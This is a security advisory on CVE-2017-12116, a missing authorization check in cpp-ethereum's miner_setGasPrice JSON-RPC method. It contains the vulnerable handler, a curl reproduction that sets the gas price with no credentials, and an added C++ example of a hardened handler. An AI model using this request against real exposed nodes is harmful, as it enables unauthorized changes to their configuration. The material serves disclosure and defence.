ID TALOS-2017-0468 Type talos Reporter Talos Intelligence Modified 2018-01-09T00:00:00
Description
Summary
An exploitable improper authorization vulnerability exists in the miner_setGasPrice API of cpp-ethereum's JSON-RPC interface (commit 4e1015743b95821849d001618a7ce82c7c073768). A single JSON-RPC request reaches functionality reserved for the administrator, bypassing authorization. An attacker can send such a request to trigger this vulnerability.
CPP-Ethereum is a C++ Ethereum client, one of the three most popular clients for the Ethereum platform. One of its components is a JSON-RPC server which exposes various APIs to manage client/node functionality. A missing authorization check in the implementation of the `miner_setGasPrice` API allows a remote attacker without any credentials to trigger functionality reserved for a user with administrator privileges: the node prints a JSONRPC Admin Session Key at startup, but this method never asks for it. We can observe a similar approach in two other clients (no authorization of any kind), but in this case the situation is exacerbated by the fact that:
- By default the interface is bound to 0.0.0.0, which means it is exposed to the world.
- The Content-Type 'application/json' is not enforced on requests, which means that even if the eth JSON-RPC daemon runs on a machine behind NAT, the JSON-RPC APIs can still be triggered by CSRF or SSRF attacks (the reproduction below uses curl --data, which sends application/x-www-form-urlencoded, and the call still succeeds).
- An older version of the same API had implemented an authorization check.
- There is no visible option to change the default JSON-RPC interface to localhost.
For comparison, geth (the Go Ethereum client) also implements a JSON-RPC interface but with much better security practices:
- by default the interface is bound to localhost
- the "Content-Type" request header value must be set to 'application/json'
- CORS settings block all "cross-domain" requests by default
Let us take a look at `miner_setGasPrice` and describe the missing authorization check in detail. The handler takes only the gas price; there is no session parameter and no check that the caller holds the admin session key before the gas pricer is updated:

    bool AdminEth::miner_setGasPrice(string const& _gasPrice)
    {
        m_gp.setAsk(jsToU256(_gasPrice));
        return true;
    }
We are aware that this client is not recommended for mining and that the administrator interface (enabled in the reproduction below with --admin-via-http) is turned off by default. However, when it is enabled the default behavior is insecure and allows a remote attacker to perform unauthenticated admin RPC requests.
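The following is an added illustration and is not code from cpp-ethereum or from the advisory: a minimal stand-in for an admin JSON-RPC handler that places the unauthenticated shape from the listing above next to a hardened shape which requires the admin session key, plus a Content-Type gate of the kind the geth comparison describes. The `GasPricer`, `AdminSessions`, `Request`, `Status` and `dispatch` names, the single-key session model and the decimal parser are all hypothetical; only the method name and the session key value printed in the reproduction output are taken from the advisory.

```cpp
// Added example (not cpp-ethereum code). All types below are hypothetical.
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <string>
#include <utility>
#include <vector>

// Stand-in for the gas pricer the real handler updates through m_gp.setAsk().
struct GasPricer {
    std::uint64_t ask = 20;
};

// Stand-in for the "JSONRPC Admin Session Key" printed at node startup.
// A single stored key compared on each call is an assumption of this example.
class AdminSessions {
public:
    explicit AdminSessions(std::string key) : m_key(std::move(key)) {}
    bool valid(const std::string& session) const {
        return !session.empty() && session == m_key;
    }
private:
    std::string m_key;
};

// Decimal parser used in place of jsToU256: accepts 1-19 ASCII digits only,
// so an attacker-controlled string can neither wrap nor throw.
static bool parseGasPrice(const std::string& s, std::uint64_t& out) {
    if (s.empty() || s.size() > 19) return false;
    std::uint64_t v = 0;
    for (char c : s) {
        if (c < '0' || c > '9') return false;
        v = v * 10 + static_cast<std::uint64_t>(c - '0');
    }
    out = v;
    return true;
}

// Vulnerable shape, mirroring the advisory's listing: no session argument,
// so no caller identity is consulted before the privileged state change.
class VulnerableAdminEth {
public:
    explicit VulnerableAdminEth(GasPricer& gp) : m_gp(gp) {}
    bool miner_setGasPrice(const std::string& _gasPrice) {
        std::uint64_t v = 0;
        parseGasPrice(_gasPrice, v);  // result ignored, like jsToU256
        m_gp.ask = v;
        return true;
    }
private:
    GasPricer& m_gp;
};

enum class Status { Ok, Unauthorized, BadRequest, MethodNotFound };

// Hardened shape: the session is verified before anything is changed, and a
// malformed gas price is rejected rather than applied.
class HardenedAdminEth {
public:
    HardenedAdminEth(GasPricer& gp, const AdminSessions& sessions)
        : m_gp(gp), m_sessions(sessions) {}
    Status miner_setGasPrice(const std::string& _session, const std::string& _gasPrice) {
        if (!m_sessions.valid(_session)) return Status::Unauthorized;
        std::uint64_t v = 0;
        if (!parseGasPrice(_gasPrice, v)) return Status::BadRequest;
        m_gp.ask = v;
        return Status::Ok;
    }
private:
    GasPricer& m_gp;
    const AdminSessions& m_sessions;
};

// One parsed HTTP request as the transport hands it to the RPC layer.
struct Request {
    std::string contentType;           // raw Content-Type header value
    std::string method;                // JSON-RPC "method"
    std::vector<std::string> params;   // JSON-RPC "params", all as strings
};

// Media type without parameters, lower-cased: "Application/JSON; charset=utf-8"
// becomes "application/json".
static std::string mediaType(const std::string& contentType) {
    std::string t = contentType.substr(0, contentType.find(';'));
    std::size_t b = t.find_first_not_of(" \t");
    if (b == std::string::npos) return "";
    std::size_t e = t.find_last_not_of(" \t");
    t = t.substr(b, e - b + 1);
    for (char& c : t) c = static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    return t;
}

// Transport-level gate: only application/json bodies are dispatched. HTML forms
// can only send text/plain, multipart or urlencoded bodies, and a cross-origin
// fetch that sets application/json triggers a CORS preflight, so this stops
// simple browser CSRF. It does nothing against SSRF or a direct connection to a
// 0.0.0.0 bind; binding to localhost remains the primary control.
Status dispatch(HardenedAdminEth& admin, const Request& r) {
    if (mediaType(r.contentType) != "application/json") return Status::BadRequest;
    if (r.method == "miner_setGasPrice") {
        if (r.params.size() != 2) return Status::BadRequest;
        return admin.miner_setGasPrice(r.params[0], r.params[1]);
    }
    return Status::MethodNotFound;
}

int main() {
    GasPricer gp;
    VulnerableAdminEth vuln(gp);
    vuln.miner_setGasPrice("1");  // succeeds with no credentials, as in the advisory
    AdminSessions sessions("Zt9zxSANHZs=");  // key value from the reproduction output
    HardenedAdminEth hard(gp, sessions);
    Request anon{"application/json", "miner_setGasPrice", {"", "1"}};
    Request csrf{"text/plain", "miner_setGasPrice", {"Zt9zxSANHZs=", "1"}};
    Request ok{"application/json; charset=utf-8", "miner_setGasPrice", {"Zt9zxSANHZs=", "42"}};
    bool pass = dispatch(hard, anon) == Status::Unauthorized
             && dispatch(hard, csrf) == Status::BadRequest
             && dispatch(hard, ok) == Status::Ok && gp.ask == 42;
    return pass ? 0 : 1;
}
```

The two guards address different attackers: the session check is what the vulnerable handler lacks and stops anyone who can reach the socket, while the Content-Type gate only removes the browser-CSRF path that the advisory's second bullet describes. Neither substitutes for binding the interface to localhost, which the advisory notes cpp-ethereum offers no visible option for.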
Crash Information
icewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http
cpp-ethereum, a C++ Ethereum client
cpp-ethereum 1.3.0
By cpp-ethereum contributors, (c) 2013-2016.
See the README for contributors and credits.
Networking disabled. To start, use netstart or pass --bootstrap or a remote host.
JSONRPC Admin Session Key: Zt9zxSANHZs=
ℹ 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000…
ℹ 03:09:10 AM.978|miner0 Full DAG loaded
icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{"jsonrpc":"2.0","method":"miner_setGasPrice","params":["1"],"id":1}' localhost:8545
{"id":1,"jsonrpc":"2.0","result":true}
Timeline
2017-12-06 - Vendor Disclosure
2018-01-09 - Public Release
Tested Versions
Ethereum commit 4e1015743b95821849d001618a7ce82c7c073768
Product URLs
http://cpp-ethereum.org
CVSSv3 Score
6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N
CWE
CWE-285: Improper Authorization
CVE
CVE-2017-12116
References
- Talos report: https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0468
- NVD entry (published 2018-01-19): https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12116 (NVD scores the issue differently from Talos: CVSS 3.1 8.1 HIGH, CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS 2.0 6.8 MEDIUM, AV:N/AC:M/Au:N/C:P/I:P/A:P; classified as CWE-863; affected product cpe:2.3:a:ethereum:aleth:-:*:*:*:*:*:*:*)
- Seebug SSV:97066 (published 2018-01-10): https://www.seebug.org/vuldb/ssvid-97066
- Talos blog: TALOSBLOG:B0D11FD8DA4E92C5F60226FDECD81A2B